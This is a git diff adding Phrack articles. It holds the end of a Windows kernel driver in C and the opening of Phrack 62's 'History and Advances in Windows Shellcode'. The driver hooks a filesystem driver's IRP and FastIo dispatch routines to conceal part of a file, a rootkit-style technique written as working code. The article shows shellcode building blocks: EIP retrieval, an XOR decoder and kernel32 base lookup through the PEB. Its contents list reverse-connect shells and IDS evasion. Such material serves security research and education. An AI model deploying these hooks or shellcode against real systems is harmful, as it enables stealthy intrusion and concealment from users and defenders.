+    FILE_ACCESS_INFORMATION AccessInformation;
+    FILE_POSITION_INFORMATION PositionInformation;
+    FILE_MODE_INFORMATION ModeInformation;
+    FILE_ALIGNMENT_INFORMATION AlignmentInformation;
+    FILE_NAME_INFORMATION NameInformation;
+} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
+
+typedef struct tag_QUERY_DIRECTORY
+{
+  ULONG Length;
+  PUNICODE_STRING FileName;
+  FILE_INFORMATION_CLASS FileInformationClass;
+  ULONG FileIndex;
+} QUERY_DIRECTORY, *PQUERY_DIRECTORY;
+
+#pragma pack(push, 4)
+
+typedef struct tag_FQD_SmallCommonBlock
+{
+  ULONG   NextEntryOffset;
+  ULONG   FileIndex;
+} FQD_SmallCommonBlock, *PFQD_SmallCommonBlock;
+
+typedef struct tag_FQD_FILE_ATTR
+{
+  TIME    CreationTime;
+  TIME    LastAccessTime;
+  TIME    LastWriteTime;
+  TIME    ChangeTime;
+  LARGE_INTEGER EndOfFile;
+  LARGE_INTEGER AllocationSize;
+  ULONG   FileAttributes;
+} FQD_FILE_ATTR, *PFQD_FILE_ATTR;
+
+typedef struct tag_FQD_CommonBlock
+{
+  FQD_SmallCommonBlock SmallCommonBlock;
+  FQD_FILE_ATTR        FileAttr;
+  ULONG                FileNameLength;
+} FQD_CommonBlock, *PFQD_CommonBlock;
+
+typedef struct _KFILE_DIRECTORY_INFORMATION
+{
+  FQD_CommonBlock CommonBlock;
+
+  WCHAR  FileName[ANYSIZE_ARRAY];
+} KFILE_DIRECTORY_INFORMATION, *PKFILE_DIRECTORY_INFORMATION;
+
+typedef struct _KFILE_FULL_DIR_INFORMATION
+{
+  FQD_CommonBlock CommonBlock;
+
+  ULONG  EaSize;
+  WCHAR  FileName[ANYSIZE_ARRAY];
+} KFILE_FULL_DIR_INFORMATION, *PKFILE_FULL_DIR_INFORMATION;
+
+typedef struct _KFILE_BOTH_DIR_INFORMATION
+{
+  FQD_CommonBlock CommonBlock;
+
+  ULONG  EaSize;
+  USHORT ShortFileNameLength;
+  WCHAR  ShortFileName[12];
+  WCHAR  FileName[ANYSIZE_ARRAY];
+} KFILE_BOTH_DIR_INFORMATION, *PKFILE_BOTH_DIR_INFORMATION;
+
+#pragma pack(pop)
+
+/////////////////////////////////////////////////////////////////////
+// Global variables
+PDRIVER_OBJECT      pDriverObject;
+PDRIVER_DISPATCH        OldReadDisp, OldWriteDisp, OldQueryDisp, OldSetInfoDisp, OldDirCtlDisp;
+PFAST_IO_READ                OldFastIoReadDisp;
+PFAST_IO_WRITE                OldFastIoWriteDisp;
+PFAST_IO_QUERY_STANDARD_INFO        OldFastIoQueryStandartInfoDisp;
+
+//Size of our file's Invisible Part (in bytes)
+ULONG InvisiblePartSize = 10;
+//File, part of which we want to hide
+wchar_t OurFileName[] = L"testing.fil";
+
+//Size of OurFileName in bytes, excluding null terminator
+ULONG OurFileNameLen = sizeof(OurFileName) - sizeof(wchar_t);
+
+
+/////////////////////////////////////////////////////////////////////
+// Functions
+
+//Function returns true if FN matches OurFileName
+bool ThisIsOurFile(PUNICODE_STRING FN)
+{
+        return ((FN->Buffer) &&
+                (FN->Length >= OurFileNameLen) &&
+                _wcsnicmp((wchar_t*)((char*)FN->Buffer + FN->Length - OurFileNameLen),
+                OurFileName, OurFileNameLen/2)==0);
+}
+
+//Structure used to track IRPs which completion must be handled
+struct s_ComplRtnTrack
+{
+        PIO_COMPLETION_ROUTINE CompletionRoutine;
+        PVOID Context;
+        //When CompletionRoutine is called, flags corresponds to InvokeOn*
+        UCHAR Control;
+        PIO_STACK_LOCATION CISL;
+        FILE_INFORMATION_CLASS FileInformationClass;
+        PVOID Buffer;
+};
+
+//Function set new CompletionRoutine, InvokeOnSuccess flag,
+//and copies original fields to Context
+void HookIrpCompletion(PIO_STACK_LOCATION CISL,
+                                           PIO_COMPLETION_ROUTINE CompletionRoutine,
+                                           PVOID Buffer,
+                                           FILE_INFORMATION_CLASS FileInformationClass)
+{
+        s_ComplRtnTrack* NewContext =
+                (s_ComplRtnTrack*)ExAllocatePool(NonPagedPool, sizeof(s_ComplRtnTrack));
+        NewContext->CompletionRoutine = CISL->CompletionRoutine;
+        NewContext->Context = CISL->Context;
+        NewContext->Control = CISL->Control;
+        NewContext->CISL = CISL;
+        //Since CISL.Parameters unavailabile in IrpCompletion handler,
+        //let's save all necessary data in Context structure
+        NewContext->FileInformationClass = FileInformationClass;
+        NewContext->Buffer = Buffer;
+        CISL->CompletionRoutine = CompletionRoutine;
+        CISL->Context = NewContext;
+        CISL->Control |= SL_INVOKE_ON_SUCCESS;
+}
+
+//Function handles IRP completion
+NTSTATUS NewComplRtn (
+                                          IN PDEVICE_OBJECT DeviceObject,
+                                          IN PIRP Irp,
+                                          s_ComplRtnTrack* CXT)
+{
+        //Handle different types of IRP
+        switch (CXT->CISL->MajorFunction)
+        {
+        case IRP_MJ_QUERY_INFORMATION:
+                _asm int 3;
+                //ThisIsOurFile is already tested
+                switch (CXT->FileInformationClass)
+                {
+                        //In all cases modify CurrentByteOffset and/or size (EndOfFile)
+                        //to hide first InvisiblePartSize bytes
+                case FilePositionInformation:
+                        ((PFILE_POSITION_INFORMATION)CXT->Buffer)->CurrentByteOffset.QuadPart -= InvisiblePartSize;
+                        break;
+                case FileEndOfFileInformation:
+                        ((PFILE_END_OF_FILE_INFORMATION)CXT->Buffer)->EndOfFile.QuadPart -= InvisiblePartSize;
+                        break;
+                case FileStandardInformation:
+                        ((PFILE_STANDARD_INFORMATION)CXT->Buffer)->EndOfFile.QuadPart -= InvisiblePartSize;
+                        break;
+                case FileAllocationInformation:
+                        ((PFILE_ALLOCATION_INFORMATION)CXT->Buffer)->AllocationSize.QuadPart -= InvisiblePartSize;
+                        break;
+                case FileAllInformation:
+                        ((PFILE_ALL_INFORMATION)CXT->Buffer)->PositionInformation.CurrentByteOffset.QuadPart -= InvisiblePartSize;
+                        ((PFILE_ALL_INFORMATION)CXT->Buffer)->StandardInformation.EndOfFile.QuadPart -= InvisiblePartSize;
+                        break;
+                }
+        case IRP_MJ_DIRECTORY_CONTROL:
+                //Get a pointer to first directory entries
+                PFQD_SmallCommonBlock pQueryDirWin32 = (PFQD_SmallCommonBlock)CXT->Buffer;
+                //Cycle through directory entries
+                while (1)
+                {
+                        PWCHAR pFileName = 0;
+                        ULONG dwFileNameLength = 0;
+                        switch (CXT->FileInformationClass)
+                        {
+                                //In all cases get pointer to FileName and FileNameLength
+                        case FileDirectoryInformation:
+                                dwFileNameLength = ((PKFILE_DIRECTORY_INFORMATION)pQueryDirWin32)->CommonBlock.FileNameLength;
+                                pFileName = ((PKFILE_DIRECTORY_INFORMATION)pQueryDirWin32)->FileName;
+                                break;
+                        case FileFullDirectoryInformation:
+                                dwFileNameLength = ((PKFILE_FULL_DIR_INFORMATION)pQueryDirWin32)->CommonBlock.FileNameLength;
+                                pFileName = ((PKFILE_FULL_DIR_INFORMATION)pQueryDirWin32)->FileName;
+                                break;
+                        case FileBothDirectoryInformation:
+                                dwFileNameLength = ((PKFILE_BOTH_DIR_INFORMATION)pQueryDirWin32)->CommonBlock.FileNameLength;
+                                pFileName = ((PKFILE_BOTH_DIR_INFORMATION)pQueryDirWin32)->FileName;
+                                break;
+                        }
+                        //_asm int 3;
+                        //Is this file that we want?
+                        if ((dwFileNameLength == OurFileNameLen) &&
+                                _wcsnicmp(pFileName, OurFileName, OurFileNameLen/2)==0)
+                        {
+                                //_asm int 3;
+                                //Hide first InvisiblePartSize bytes
+                                ((PFQD_CommonBlock)pQueryDirWin32)->FileAttr.EndOfFile.QuadPart -= InvisiblePartSize;
+                                break;
+                        }
+                        //Quit if no more directory entries
+                        if (!pQueryDirWin32->NextEntryOffset) break;
+                        //Continue with next directory entry
+                        pQueryDirWin32 = (PFQD_SmallCommonBlock)((CHAR*)pQueryDirWin32 + pQueryDirWin32->NextEntryOffset);
+                }
+                
+        }
+        //If appropriate Control flag was set,...
+        if (
+                ((CXT->Control == SL_INVOKE_ON_SUCCESS)&&(NT_SUCCESS(Irp->IoStatus.Status)))
+                || ((CXT->Control == SL_INVOKE_ON_ERROR)&&(NT_ERROR(Irp->IoStatus.Status)))
+                || ((CXT->Control == SL_INVOKE_ON_CANCEL)&&(Irp->IoStatus.Status == STATUS_CANCELLED)) )
+                //...call original CompletionRoutine
+                return CXT->CompletionRoutine(
+                DeviceObject,
+                Irp,
+                CXT->Context);
+        else return STATUS_SUCCESS;
+}
+
+//Filename IRP handler deal with
+#define FName &(CISL->FileObject->FileName)
+
+//Function handles IRP_MJ_READ and IRP_MJ_WRITE
+NTSTATUS NewReadWriteDisp (
+                                                   IN PDEVICE_OBJECT DeviceObject,
+                                                   IN PIRP Irp)
+{
+        //_asm int 3;
+        PIO_STACK_LOCATION CISL = IoGetCurrentIrpStackLocation(Irp);
+        if (CISL->FileObject &&
+                //Don't mess with swaping
+                !(Irp->Flags & IRP_PAGING_IO)  && !(Irp->Flags & IRP_SYNCHRONOUS_PAGING_IO))
+        {
+                if (ThisIsOurFile(FName))
+                {
+                        //_asm int 3;
+                        CISL->Parameters.Write.ByteOffset.QuadPart += InvisiblePartSize;
+                        //Write and Read has the same structure, thus handled together
+                }
+        }
+        //Call corresponding original handler
+        switch (CISL->MajorFunction)
+        {
+        case IRP_MJ_READ:
+                return OldReadDisp(DeviceObject, Irp);
+        case IRP_MJ_WRITE:
+                return OldWriteDisp(DeviceObject, Irp);
+        }
+}
+
+//Function handles IRP_MJ_QUERY_INFORMATION
+NTSTATUS NewQueryDisp (
+                                           IN PDEVICE_OBJECT DeviceObject,
+                                           IN PIRP Irp)
+{
+        //_asm int 3;
+        PIO_STACK_LOCATION CISL = IoGetCurrentIrpStackLocation(Irp);        
+        if ((CISL->MajorFunction == IRP_MJ_QUERY_INFORMATION) &&
+                ThisIsOurFile(FName))
+        {
+                //_asm int 3;
+                switch (CISL->Parameters.QueryFile.FileInformationClass)
+                {
+                        //Information types that contains file size or current offset
+                case FilePositionInformation:
+                case FileEndOfFileInformation:
+                case FileStandardInformation:
+                case FileAllocationInformation:
+                case FileAllInformation:
+                        //_asm int 3;
+                        HookIrpCompletion(CISL, (PIO_COMPLETION_ROUTINE)NewComplRtn, Irp->AssociatedIrp.SystemBuffer, CISL->Parameters.QueryFile.FileInformationClass);
+                }
+        }
+        //Call original handler
+        return OldQueryDisp(DeviceObject, Irp);
+}
+
+//Function handles IRP_MJ_SET_INFORMATION
+NTSTATUS NewSetInfoDisp (
+                                                 IN PDEVICE_OBJECT DeviceObject,
+                                                 IN PIRP Irp)
+{
+        //_asm int 3;
+        PIO_STACK_LOCATION CISL = IoGetCurrentIrpStackLocation(Irp);        
+        if (CISL->FileObject && ThisIsOurFile(FName))
+        {
+                //_asm int 3;
+                switch (CISL->Parameters.QueryFile.FileInformationClass)
+                {
+                        //Information types that contains file size or current offset.
+                        //In all cases modify CurrentByteOffset and/or size (EndOfFile)
+                        //to hide first InvisiblePartSize bytes
+                case FilePositionInformation:
+                        ((PFILE_POSITION_INFORMATION)Irp->AssociatedIrp.SystemBuffer)->CurrentByteOffset.QuadPart += InvisiblePartSize;
+                        break;
+                case FileEndOfFileInformation:
+                        ((PFILE_END_OF_FILE_INFORMATION)Irp->AssociatedIrp.SystemBuffer)->EndOfFile.QuadPart += InvisiblePartSize;
+                        break;
+                case FileStandardInformation:
+                        ((PFILE_STANDARD_INFORMATION)Irp->AssociatedIrp.SystemBuffer)->EndOfFile.QuadPart += InvisiblePartSize;
+                        break;
+                case FileAllocationInformation:
+                        //_asm int 3;
+                        ((PFILE_ALLOCATION_INFORMATION)Irp->AssociatedIrp.SystemBuffer)->AllocationSize.QuadPart += InvisiblePartSize;
+                        break;
+                case FileAllInformation:
+                        ((PFILE_ALL_INFORMATION)Irp->AssociatedIrp.SystemBuffer)->PositionInformation.CurrentByteOffset.QuadPart += InvisiblePartSize;
+                        ((PFILE_ALL_INFORMATION)Irp->AssociatedIrp.SystemBuffer)->StandardInformation.EndOfFile.QuadPart += InvisiblePartSize;
+                        break;
+                }
+        }
+        //Call original handler
+        return OldSetInfoDisp(DeviceObject, Irp);
+}
+
+//Function handles IRP_MJ_DIRECTORY_CONTROL
+NTSTATUS NewDirCtlDisp (
+                                                 IN PDEVICE_OBJECT DeviceObject,
+                                                 IN PIRP Irp)
+{
+        void *pBuffer;
+        PIO_STACK_LOCATION CISL = IoGetCurrentIrpStackLocation(Irp);        
+//_asm int 3;
+        if ((CISL->MajorFunction == IRP_MJ_DIRECTORY_CONTROL) &&
+                (CISL->MinorFunction == IRP_MN_QUERY_DIRECTORY))
+        {
+                //Handle both ways of passing user supplied buffer
+                if (Irp->MdlAddress)
+                        pBuffer = MmGetSystemAddressForMdl(Irp->MdlAddress);
+                else
+                        pBuffer = Irp->UserBuffer;
+                HookIrpCompletion(CISL, (PIO_COMPLETION_ROUTINE)NewComplRtn, pBuffer, ((PQUERY_DIRECTORY)(&CISL->Parameters))->FileInformationClass);
+        }
+        //Call original handler
+        return OldDirCtlDisp(DeviceObject, Irp);
+}
+
+#undef FName
+
+//Function handles FastIoRead
+BOOLEAN NewFastIoRead(
+    IN PFILE_OBJECT FileObject,
+    IN PLARGE_INTEGER FileOffset,
+    IN ULONG Length,
+    IN BOOLEAN Wait,
+    IN ULONG LockKey,
+    OUT PVOID Buffer,
+    OUT PIO_STATUS_BLOCK IoStatus,
+    IN PDEVICE_OBJECT DeviceObject
+    )
+{
+        LARGE_INTEGER NewFileOffset;
+        //_asm int 3;
+        if ((FileObject) && (ThisIsOurFile(&FileObject->FileName)))
+        {
+                //_asm int 3;
+                //Modify FileOffset to hide first InvisiblePartSize bytes
+                NewFileOffset.QuadPart = FileOffset->QuadPart + InvisiblePartSize;
+                return OldFastIoReadDisp(FileObject, &NewFileOffset, Length, Wait, LockKey, Buffer,
+                        IoStatus, DeviceObject);
+        }
+        //Call original handler
+        return OldFastIoReadDisp(FileObject, FileOffset, Length, Wait, LockKey, Buffer,
+                IoStatus, DeviceObject);
+}
+
+//Function handles FastIoWrite
+BOOLEAN NewFastIoWrite(
+                                           IN PFILE_OBJECT FileObject,
+                                           IN PLARGE_INTEGER FileOffset,
+                                           IN ULONG Length,
+                                           IN BOOLEAN Wait,
+                                           IN ULONG LockKey,
+                                           OUT PVOID Buffer,
+                                           OUT PIO_STATUS_BLOCK IoStatus,
+                                           IN PDEVICE_OBJECT DeviceObject
+                                           )
+{
+        LARGE_INTEGER NewFileOffset;
+        //_asm int 3;
+        if ((FileObject) && (ThisIsOurFile(&FileObject->FileName)))
+        {
+                //_asm int 3;
+                //Modify FileOffset to hide first InvisiblePartSize bytes
+                NewFileOffset.QuadPart = FileOffset->QuadPart + InvisiblePartSize;
+                return OldFastIoWriteDisp(FileObject, &NewFileOffset, Length, Wait, LockKey, Buffer,
+                        IoStatus, DeviceObject);
+        }
+        return OldFastIoWriteDisp(FileObject, FileOffset, Length, Wait, LockKey, Buffer,
+                IoStatus, DeviceObject);
+}
+
+//Function handles FastIoQueryStandartInfo
+BOOLEAN NewFastIoQueryStandartInfo(
+                                                                IN struct _FILE_OBJECT *FileObject,
+                                                                IN BOOLEAN Wait,
+                                                                OUT PFILE_STANDARD_INFORMATION Buffer,
+                                                                OUT PIO_STATUS_BLOCK IoStatus,
+                                                                IN struct _DEVICE_OBJECT *DeviceObject
+                                                                )
+{
+        //Call original handler
+        BOOLEAN status = OldFastIoQueryStandartInfoDisp(FileObject, Wait, Buffer, IoStatus, DeviceObject);
+        if ((FileObject) && (ThisIsOurFile(&FileObject->FileName)))
+        {
+                //_asm int 3;
+                //Modify EndOfFile to hide first InvisiblePartSize bytes
+                Buffer->EndOfFile.QuadPart -= InvisiblePartSize;
+        }
+        return status;
+}
+
+extern "C"
+NTSYSAPI
+NTSTATUS
+NTAPI
+ObReferenceObjectByName(
+                                                IN PUNICODE_STRING ObjectPath,
+                                                IN ULONG Attributes,
+                                                IN PACCESS_STATE PassedAccessState OPTIONAL,
+                                                IN ACCESS_MASK DesiredAccess OPTIONAL,
+                                                IN POBJECT_TYPE ObjectType,
+                                                IN KPROCESSOR_MODE AccessMode,
+                                                IN OUT PVOID ParseContext OPTIONAL,
+                                                OUT PVOID *ObjectPtr
+                                                );  
+
+extern "C" PVOID IoDriverObjectType;
+
+//Function hooks given dispatch function (MajorFunction)
+VOID InterceptFunction(UCHAR MajorFunction,
+                                           PDRIVER_OBJECT  pDriverObject,
+                                           OPTIONAL PDRIVER_DISPATCH *OldFunctionPtr,
+                                           OPTIONAL PDRIVER_DISPATCH NewFunctionPtr)
+{
+        PDRIVER_DISPATCH                                *TargetFn;
+        
+        TargetFn = &(pDriverObject->MajorFunction[MajorFunction]);
+        //hook only if handler exists
+        if (*TargetFn)
+        {
+                if (OldFunctionPtr) *OldFunctionPtr = *TargetFn;
+                if (NewFunctionPtr) *TargetFn = NewFunctionPtr;
+        }
+}
+
+//Function hooks given driver's dispatch functions
+NTSTATUS Intercept(PWSTR pwszDeviceName)
+{
+        UNICODE_STRING                DeviceName;
+        NTSTATUS status;
+        KIRQL OldIrql;
+        
+        _asm int 3;
+        
+        pDriverObject = NULL;
+        RtlInitUnicodeString(&DeviceName, pwszDeviceName);
+        status = ObReferenceObjectByName(&DeviceName, OBJ_CASE_INSENSITIVE, NULL, 0, (POBJECT_TYPE)IoDriverObjectType, KernelMode, NULL, (PVOID*)&pDriverObject);
+        if (pDriverObject)
+        {
+                //Raise IRQL to avoid context switch
+                //when some pointer is semi-modified
+                KeRaiseIrql(HIGH_LEVEL, &OldIrql);
+                //hook dispatch functions
+                InterceptFunction(IRP_MJ_READ, pDriverObject, &OldReadDisp, NewReadWriteDisp);
+                InterceptFunction(IRP_MJ_WRITE, pDriverObject, &OldWriteDisp, NewReadWriteDisp);
+                InterceptFunction(IRP_MJ_QUERY_INFORMATION, pDriverObject, &OldQueryDisp, NewQueryDisp);
+                InterceptFunction(IRP_MJ_SET_INFORMATION, pDriverObject, &OldSetInfoDisp, NewSetInfoDisp);
+                InterceptFunction(IRP_MJ_DIRECTORY_CONTROL, pDriverObject, &OldDirCtlDisp, NewDirCtlDisp);
+                //hook FastIo dispatch functions if FastIo table exists
+                if (pDriverObject->FastIoDispatch)
+                {
+                        //     w2k [rus]
+                        //It would be better to copy FastIo table to avoid
+                        //messing with kernel memory protection, but it works as it is
+                        OldFastIoReadDisp = pDriverObject->FastIoDispatch->FastIoRead;
+                        pDriverObject->FastIoDispatch->FastIoRead = NewFastIoRead;
+                        OldFastIoWriteDisp = pDriverObject->FastIoDispatch->FastIoWrite;
+                        pDriverObject->FastIoDispatch->FastIoWrite = NewFastIoWrite;
+                        OldFastIoQueryStandartInfoDisp = pDriverObject->FastIoDispatch->FastIoQueryStandardInfo;
+                        pDriverObject->FastIoDispatch->FastIoQueryStandardInfo = NewFastIoQueryStandartInfo;
+                }
+                KeLowerIrql(OldIrql);
+        }
+        
+        return status;
+}
+
+//Function cancels hooking
+VOID UnIntercept()
+{
+        KIRQL OldIrql;
+        if (pDriverObject)
+        {
+                KeRaiseIrql(HIGH_LEVEL, &OldIrql);
+                InterceptFunction(IRP_MJ_READ, pDriverObject, NULL, OldReadDisp);
+                InterceptFunction(IRP_MJ_WRITE, pDriverObject, NULL, OldWriteDisp);
+                InterceptFunction(IRP_MJ_QUERY_INFORMATION, pDriverObject, NULL, OldQueryDisp);
+                InterceptFunction(IRP_MJ_SET_INFORMATION, pDriverObject, NULL, OldSetInfoDisp);
+                InterceptFunction(IRP_MJ_DIRECTORY_CONTROL, pDriverObject, NULL, OldDirCtlDisp);
+                if (pDriverObject->FastIoDispatch)
+                {
+                        pDriverObject->FastIoDispatch->FastIoRead = OldFastIoReadDisp;
+                        pDriverObject->FastIoDispatch->FastIoWrite = OldFastIoWriteDisp;
+                        pDriverObject->FastIoDispatch->FastIoQueryStandardInfo = OldFastIoQueryStandartInfoDisp;
+                }
+                KeLowerIrql(OldIrql);
+                ObDereferenceObject(pDriverObject);
+        }
+}
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/7.txt b/phrack62/7.txt
new file mode 100644
index 0000000..80738ab
--- /dev/null
+++ b/phrack62/7.txt
@@ -0,0 +1,1296 @@
+                             ==Phrack Inc.==
+
+               Volume 0xXX, Issue 0x3e, Phile #0x07 of 0x10
+
+
+|=-----------=[ History and Advances in Windows Shellcode ]=-------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ sk <sk at scan-associates d0t net> ]=----------------=|
+|=------------------------=[ June 22nd, 2004 ]=--------------------------=|
+
+--[ Contents
+
+	1. Abstract
+	2. Introduction to shellcode
+		a. Why shellcode?
+		b. Windows shellcode skeleton
+			i. Getting EIP
+			ii. Decoder
+			iii. Getting address of required function
+			iv. Locating Kernel32 base memory
+			v. Getting GetProcAddress()
+			vi. Getting other functions by name
+			vii. Spawning a shell
+		c. Compiling our shellcode
+	3. The connection
+		a. Bind to port shellcode
+			i. Bind to port shellcode implementation
+			ii. Problem with Bind to port shellcode
+		b. Reverse connect
+			i. Reverse connect shellcode implementation
+			ii. Problem with reverse connect shellcode
+	4. One-way shellcode
+		a. Find socket shellcode
+			i. Problem with find socket shellcode
+		b. Reuse address shellcode
+			i. Reuse address shellcode implementation
+			ii. Problem with reuse address shellcode
+		c. Rebind socket
+			i. Rebind socket shellcode implementation
+		d. Other one-way shellcode
+	5. Transferring file using shellcode
+		a. Uploading file with debug.exe
+		b. Uploading file with VBS
+		c. Retrieving file from command line
+	6. Avoiding IDS detection
+	7. Restarting vulnerable service
+	8. End of shellcode?
+	9. Greetz!
+	10. References
+	11. The code
+
+
+--[ 1. Abstract
+
+Firewall is everywhere in the Internet now. Most of the exploits 
+released in the public have little concern over firewall rules 
+because they are just proof of concept. In real world, we would 
+encounter targets with firewall that will make exploitation harder. 
+We need to overcome these obstacles for a successful penetration 
+testing job. The research of this paper started when we need to take 
+over (own) a machine which is heavily protected with rigid firewall 
+rules. Although we can reach the vulnerable service but the strong 
+firewall rules between us and the server hinder all standard exploits 
+useless.
+
+The objective of the research is to find alternative ways which allow 
+penetration tester to take control of a machine after a successful 
+buffer overflow. A successful buffer overflow in a sense that it will 
+eventually leads to arbitrary code execution. These alternative 
+mechanisms should succeed where others fail even in the most rigid 
+firewall rules.
+
+In our research to find a way to by pass these troublesome firewall 
+rules, we looked into various existing techniques used by exploits in 
+the public and why they fail. Then, we found several mechanisms that 
+will work, but dependence to the vulnerable service. Although we can 
+take over the server using these techniques, we take one step further 
+to develop a more generic technique which is not dependence to any 
+service and can be reuse in most other buffer overflows. 
+
+This paper will start with dissection on a standard Win32 shellcode 
+as an introduction. We will then explore the techniques being used by 
+proof of concept codes to allow attacker to control the target and 
+their limitations. Then, we will introduce a few alternatives 
+techniques which we call "One-way shellcode" and how they may by pass 
+firewall rules. Finally, we also discussed on a possible way to 
+transfer file from command line without breaking the firewall rule.
+
+
+--[ 2. Introduction to shellcode 
+
+An exploit usually consists of two major components:
+1.	Exploitation technique
+2.	Payload
+
+The objective of the exploitation part is to divert the execution 
+path of the vulnerable program. We can achieve that via one of these 
+techniques:
+
+*	Stack-based Buffer Overflow
+*	Heap-based Buffer Overflow
+*	Format String
+*	Integer Overflow
+*	Memory corruption, etc
+
+Even though we may use one or more of those exploitation techniques 
+to control the execution path of a program, each vulnerability need 
+to be exploited differently. Every vulnerability has different way to 
+trigger the bug. We may use different buffer size or character set to 
+trigger the overflow. Although we can probably use the same technique 
+for vulnerabilities in the same class, we cannot use the same code.
+
+Once we control of the execution path, we probably want it to execute 
+our code. Thus, we need to include these code or instruction set in 
+our exploit. The part of code which allows us to execute arbitrary 
+code is known as payload. The payload can virtually do everything a 
+computer program can do with the permission of the vulnerable service. 
+
+A payload that spawns you a shell is known as a shellcode. It allows 
+interactive command execution. Unlike Exploitation technique, a well 
+designed shellcode can easily be reused in other exploits. We will 
+try to build shellcode that can be reused. A basic requirement of a 
+shellcode is the shell and a connection that allow use to use it 
+interactively.
+
+
+--[ 2.a Why shellcode?
+
+Why shellcode? Simply because it is the simplest way that allows the 
+attacker to explore the target system interactively. It might give 
+the attacker the ability to discover internal network, to further 
+penetrate into other computers. A simple "net view /domain" command 
+in Windows box would review many other easy targets.
+
+A shell may also allow upload/download file/database, which is 
+usually needed as proof of successful pen-test. You also may easily 
+install trojan horse, key logger, sniffer, Enterprise worm, WinVNC, 
+etc. An Enterprise Worm could be a computer worm which was written 
+specifically to infect other machine in the same domain using the 
+credential of the primary domain controller. 
+
+A shell is also useful to restart the vulnerable services. This will 
+keep the service running and your client happy. But more importantly, 
+restarting the vulnerable service usually allow us to attack the 
+service again. We also may clean up traces like log files and events 
+with a shell. There are just many other possibilities. 
+
+However, spawning a shell is not the only thing you can do in your 
+payload. As demonstrated by LSD in their Win32 ASM component, you can 
+create a payload that loop and wait for command from the attacker. 
+The attacker could issue a command to the payload to create new 
+connection, upload/download file or spawn a shell. There are also a 
+few others payload strategies in which the payload will loop and wait 
+for additional payload from the attacker.
+
+Regardless whether a payload is spawning a shell or loop to wait for 
+instructions, it still needs to communicate with the attacker. 
+Although we are using payload that spawns a shell throughout this 
+article, the mechanisms being use for communication can be use in 
+other payload strategy.
+
+
+--[ 2.b Windows shellcode skeleton
+
+Shellcode usually start by getting to know where you are during the 
+execution by grapping the EIP value. And then, a decoding process 
+will take place. The process will then jump into the decoded memory 
+area where execution can continue. Before we can do anything useful, 
+we need to find addresses of all functions and API that we need to 
+use in the shellcode. With that, we can setup a socket, and finally 
+spawn a shell.
+
+*	Getting EIP
+*	Decoder
+*	Getting addresses of required functions
+*	Setup socket
+*	Spawning shell
+
+Let's look into what these components suppose to do, in greater 
+detail.
+
+
+--[ 2.b.i Getting EIP
+
+We would like to make our shellcode as reusable as possible. For that, 
+we will avoid using any fixed address which could change in different 
+environment. We will use relative addressing as much as we could. To 
+start with, we need to know where we are in the memory. This address 
+will be our base address. Any variable or function in the shellcode 
+will be relative to this address. To get this address, we can use a 
+CALL and a POP instruction. As we already know, whenever we are 
+calling a function, the return value is push into the stack just 
+before the function is called. So, if the first thing we do in the 
+function is a POP command, we will obtain the return value in a 
+register. As shown below, EAX will be 451005.
+
+450000:		
+		label1:	pop eax
+450005: 		... (eax = 451005)
+
+451000: 		call label1		;start here!
+451005:
+
+Most likely you will find something similar to the code below in a 
+shellcode, which does about the same thing.
+
+450000: 			jmp label1
+450002:	
+		label2: 	jmp cont
+450004:	
+		label1: 	call label2  
+450009:	
+		cont: 		pop eax
+				... 	(eax = 450009)
+
+Another interesting mechanism being use to obtain the EIP is to make 
+use of a few special FPU instructions. This was implemented by Aaron 
+Adams in Vuln-Dev mailing list in the discussion to create pure ASCII 
+shellcode. The code uses fnstenv/fstenv instructions to save the 
+state of the FPU environment.
+
+	fldz
+	fnstenv [esp-12]
+	pop ecx
+	add cl, 10
+	nop
+
+ECX will hold the address of the EIP. However, these instructions 
+will generate non-standard ASCII characters.
+
+
+--[ 2.b.ii Decoder
+
+Buffer overflow usually will not allow NULL and a few special 
+characters. We can avoid using these characters by encoding our 
+shellcode. The easiest encoding scheme is the XOR encoding. In this 
+encoding, we will XOR each char in our shellcode with a predefined 
+value. During execution, a decoder will translate the rest of the 
+code back to real instruction by XOR it again with the predefined 
+value. As shown here, we can set the number of byte we want to decode 
+in ecx, and while eax is pointing to the starting point of our 
+encoded shellcode. We xor the destination byte by byte with 0x96 
+until the loop over. There are other more advance encoding schemes, 
+of cause. We can use a DWORD xor value instead of a char to encode 4 
+bytes at a time. We also may break the code apart by encoding them 
+using a different xor key. All with the purpose to get rid of 
+unusable chars in our shellcode.
+
+	xor	ecx, ecx
+	mov 	cl, 0C6h 			;size	
+loop1:	
+	inc	eax
+	xor 	byte ptr [eax], 96h
+	loop 	loop1
+
+The Metasploit project (http://metasploit.com/) contains a few very 
+useful encoders worth checking.
+
+
+--[ 2.b.iii Getting address of required function
+
+After the decoding process, we will jump into the memory area where 
+the decoded shellcode start to continue our execution. Before we can 
+do anything useful, we must locate the address of all APIs that we 
+need to use and store it in a jump table. We are not going to use any 
+fixed address to API because it is different between service packs. 
+To get the address of API we need, we can use an API called 
+GetProcAddress(). By supplying the name of the function we need to 
+this API, it will return the address where we can call to use it. To 
+obtain the address of GetProcAddress() itself, we can search the 
+export table of the Kernel32.dll in the memory. Kernel32.dll image is 
+located predefined in a memory location depending on the OS.
+
+*	NT - 0x77f00000
+*	2kSP2 & SP3 - 0x77e80000
+*	WinXP - 0x77e60000
+
+Since we know the default base memory of kernel32.dll is located at 
+these locations, we can start looping backward from 0x77f00000 to 
+look for "MZ\x90" byte sequences. Kernel32 start with "MZ\x90" mark 
+just like any Windows application. This trick was used by High Speed 
+Junky (HSJ) in his exploit and it works quite nicely for all the 
+above OS and service pack. However Windows 2000 SP4's Kernel32.dll is 
+located at 0x7c570000. In order to scan the memory from 0x77f00000, 
+we need to setup an exception handler that will catch invalid memory 
+access.
+
+
+--[ 2.b.iv Locating Kernel32 base memory
+
+However, there is a better method to get the kernel32 base memory. 
+Using the fs selector, we can get into our PEB. By searching the 
+PEB_LDR_DATA structure, we will find the list of DLL which our 
+vulnerable program initialized when it start. The list of DLL will be 
+loaded in sequence, first, NTDLL, followed by Kernel32. So, by 
+traveling one nod forward in the list, we will get the base memory of 
+the Kernel32.dll. This technique, complete with the code, has been 
+published by researchers in VX-zine, then used by LSD in their 
+Windows Assembly component. 
+
+	mov   eax,fs:[30h]		; PEB  base
+	mov   eax,[eax+0ch]		; goto PEB_LDR_DATA
+	; first entry in InInitializationOrderModuleList
+	mov   esi,[eax+1ch] 
+	lodsd					; forward to next LIST_ENTRY
+	mov   ebx,[eax+08h]		; Kernel32 base memory
+
+
